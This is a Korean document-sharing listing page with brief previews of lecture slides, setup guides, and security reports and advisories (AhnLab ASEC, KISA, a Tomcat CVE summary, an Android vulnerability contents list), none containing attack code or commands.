슬라이드 1 핚국산업기술대학교 제 14 강 GUI (III) 이대현교수 학습안내 학습목표 CEGUI 라이브러리를이용하여, 게임메뉴 UI 를구현해본다. 학습내용 CEGUI 레이아웃의로딩및렌더링. OIS 와 CEGUI 의연결. CEGUI 위젯과이벤트의연동. UI 구현 : 하드코딩방식 C++ 코드를이용하여, 코드내에서직접위젯들을생성및설정 CEGUI::PushButton* resumebutton

More information

암호내지2010.1.8

암호내지2010.1.8 Contents 분류 안내서 해설서 해당팀명 발간년월 대상 수준 인터넷 진흥 인터넷 이용 활성화 정보보호 시스템 관리 한국인터넷진흥원(KISA) 안내서 해설서 시리즈 DNS 설정 안내서 시스템관리팀

More information

서현수

서현수 Introduction to TIZEN SDK UI Builder S-Core 서현수 2015.10.28 CONTENTS TIZEN APP 이란? TIZEN SDK UI Builder 소개 TIZEN APP 개발방법 UI Builder 기능 UI Builder 사용방법 실전, TIZEN APP 개발시작하기 마침 TIZEN APP? TIZEN APP 이란? Mobile,

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Deep Learning 작업환경조성 & 사용법 ISL 안재원 Ubuntu 설치 작업환경조성 접속방법 사용예시 2 - ISO file Download www.ubuntu.com Ubuntu 설치 3 - Make Booting USB Ubuntu 설치 http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/

More information

슬라이드 1

슬라이드 1 Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치

More information

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

ASEC REPORT VOL 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안 ASEC REPORT VOL.90 2018 년 1 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다.

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash

More information

유포지탐지동향

유포지탐지동향 월간악성코드은닉사이트탐지 동향보고서 (7 월 ) 2014. 08. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 13 3. 악성코드은닉사례분석

More information

ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작

ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작 Security Trend ASEC REPORT VOL.80 August, 2016 ASEC REPORT VOL.80 August, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

Security Trend ASEC Report VOL.56 August, 2014

Security Trend ASEC Report VOL.56 August, 2014 Security Trend ASEC Report VOL.56 August, 2014 ASEC Report VOL.56 August, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며,

More information

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770>

<32BDBAB8B6C6AEC6F9B1DDC0B6B0C5B7A13130B0E8B8EDBEC8B3BBBCAD2E687770> 스마트폰 금융거래 10계명 안내서 배 경 금융감독원은 국내의 스마트폰 이용 활성화를 계기로 10.1월 스마트폰 전자금융서비스 안전 대책을 수립하여 금융회사가 안전한 스마트폰 금융서비스를 제공하기 위한 기반을 마련 하였습니다. 더욱 안전한 전자금융거래를 위해서는 서비스를 제공하는 금융회사뿐만 아니라, 금융소비자 스스로도 금융정보 유출, 부정거래 등 전자금융사고

More information

슬라이드 1

슬라이드 1 CCS v4 사용자안내서 CCSv4 사용자용예제따라하기안내 0. CCS v4.x 사용자 - 준비사항 예제에사용된 CCS 버전은 V4..3 버전이며, CCS 버전에따라메뉴화면이조금다를수있습니다. 예제실습전준비하기 처음시작하기예제모음집 CD 를 PC 의 CD-ROM 드라이브에삽입합니다. 아래안내에따라, 예제소스와헤더파일들을 PC 에설치합니다. CD 드라이브 \SW\TIDCS\TIDCS_DSP80x.exe

More information

(Microsoft PowerPoint - \301\24613\260\255 - oFusion \276\300 \261\270\274\272)

(Microsoft PowerPoint - \301\24613\260\255 - oFusion \276\300 \261\270\274\272) 게임엔진 제 13 강 ofusion 씬구성 이대현교수 한국산업기술대학교게임공학과 학습목차 Ofusion 을이용한 export Export 된씬의재현 씬노드애니메이션을이용한수동카메라트래킹 ofusion OGRE3D 엔진용 3D MAX 익스포터 http://www.ofusiontechnologies.com ofusion 의특징 Realtime Viewport 3D

More information

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월 메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

Dropbox Forensics

Dropbox Forensics Cloud Storage Forensics Part I : Dropbox 2013. 09. 28 forensic.n0fate.com Dropbox Forensics Dropbox Forensics Dropbox 웹기반파일공유서비스 총 12 개의클라이언트지원 Desktop : Windows, Mac OS X, Linux Mobile : ios, Android,

More information

ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며

ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며 Security Trend ASEC Report VOL.53 May, 2014 ASEC Report VOL.53 May, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정

More information

View Licenses and Services (customer)

View Licenses and Services (customer) 빠른 빠른 시작: 시작: 라이선스, 라이선스, 서비스 서비스 및 주문 주문 이력 이력 보기 보기 고객 가이드 Microsoft 비즈니스 센터의 라이선스, 서비스 및 혜택 섹션을 통해 라이선스, 온라인 서비스, 구매 기록 (주문 기록)을 볼 수 있습니다. 시작하려면, 비즈니스 센터에 로그인하여 상단 메뉴에서 재고를 선택한 후 내 재고 관리를 선택하십시오. 목차

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

Android Master Key Vulnerability

Android Master Key Vulnerability Android Master Key Vulnerability Android Bug 8219321 2013/08/06 http://johnzon3.tistory.com Johnzone 内容 1. 개요... 2 1.1. 취약점요약... 2 1.2. 취약점정보... 2 2. 분석... 2 2.1. 기본개념... 2 2.2. 공격방법... 4 3. 방어대책... 7

More information

작성자 : 기술지원부 김 삼 수

작성자 : 기술지원부 김 삼 수 작성자 : 기술지원부김삼수 qpopper 설치 qpopper란무엇인가? 메일수신을하기위해필요한프로그램으로 qpopper는가장인기있는 email 클라이언트에의해사용되는인터넷 email 다운로딩을위한 POP3프로토콜을사용합니다. 그러나 qpopper는 sendmail이나 smail과같이 SMTP프로토콜은포함하고있지않습니다. (

More information

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 사서함업그레이드로위장한계정탈취목적의악성메일주의 국내에

01 이스트시큐리티통계및분석 No 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 사서함업그레이드로위장한계정탈취목적의악성메일주의 국내에 01 이스트시큐리티통계및분석 이스트시큐리티 보안동향보고서 No.102 2018.03 01 이스트시큐리티통계및분석 No.102 2018.03 이스트시큐리티보안동향보고서 CONTENTS 01 악성코드통계및분석 악성코드동향 01-06 알약악성코드탐지통계 허니팟 / 트래픽분석 02 전문가보안기고 07-13 사서함업그레이드로위장한계정탈취목적의악성메일주의 국내에유입된전신송금확인악성메일주의

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 악성코드은닉 월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2014. 03. 침해사고대응단 인터넷침해대응본부 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 15 3. 악성코드은닉사례분석

More information